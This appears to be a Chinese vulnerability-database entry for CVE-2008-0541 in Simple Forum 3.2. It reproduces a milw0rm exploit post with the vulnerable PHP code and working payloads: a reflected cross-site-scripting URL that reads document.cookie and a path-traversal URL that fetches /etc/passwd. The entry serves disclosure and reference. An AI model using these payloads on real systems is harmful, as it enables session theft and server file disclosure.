Gerd Tentler Simple Forum forum.php 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114403 漏洞类型 跨站脚本
发布时间 2008-01-26 更新时间 2008-09-05
CVE编号 CVE-2008-0541 CNNVD-ID CNNVD-200802-008
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/4989
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-008
|漏洞详情
GerdTentlerSimpleForum3.2的forum.php中的多个跨站脚本攻击漏洞会允许远程攻击者通过(1)open和(2)date_show参数来注入任意web脚本或HTML。
|漏洞EXP
########################################################
           #                                                      #
           # SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES          #
           # author      : tomplixsee                             #  
           # my email    : tomplixsee@yahoo.co.id                 #
           #                                                      #	       
           # software    : SIMPLE FORUM v3.2                      #
           # download    : http://www.gerd-tentler.de/tools/forum/#
           #                                                      #
           ########################################################


1.XSS 
  vulnerable code on forum.php
  
  <?
  .....
  if(isset($_REQUEST['date_show'])) $date_show = $_REQUEST['date_show'];
  .....
  if(isset($_REQUEST['open'])) $open = $_REQUEST['open'];
  .....
  <input type="hidden" name="date_show" value="<? echo $date_show; ?>">
  <input type="hidden" name="open" value="<? echo $open; ?>">
  .....
example:
  http://target/path/forum.php?open="/><script>alert(document.cookie)</script>
  http://target/path/forum.php?date_show="/><script>alert(document.cookie)</script>


2.Remote File Disclosure
  vulnerable code on thumbnail.php
  
  <?
  ....
  if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
  if(isset($_REQUEST['type'])) $type = $_REQUEST['type'];
  ....
  switch($type) {
      case 1:
        if($img && function_exists('ImageGIF')) {
          header('Content-type: image/gif');
          @ImageGIF($img);
        }
        else if($img && function_exists('ImagePNG')) {
          header('Content-type: image/png');
          @ImagePNG($img);
        }
        else {
          header('Content-type: image/gif');
          readfile($file);
        }
      break;

      case 2:
        header('Content-type: image/jpeg');
        if($img && function_exists('ImageJPEG')) @ImageJPEG($img);
        else readfile($file);
      break;

      case 3:
        header('Content-type: image/png');
        if($img && function_exists('ImagePNG')) @ImagePNG($img);
        else readfile($file);
      break;
              }
  ....
  ?>

example:
 http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd
 then try to view the page source :D



salam tuk:
ira, sukabirus network community, akillers 179,bidulux,sibalbal,crutz_ao,  

# milw0rm.com [2008-01-26]
|参考资料

来源:BID
名称:27463
链接:http://www.securityfocus.com/bid/27463
来源:MILW0RM
名称:4989
链接:http://www.milw0rm.com/exploits/4989
来源:XF
名称:simpleforum-forum-xss(39978)
链接:http://xforce.iss.net/xforce/xfdb/39978
来源:SECUNIA
名称:28681
链接:http://secunia.com/advisories/28681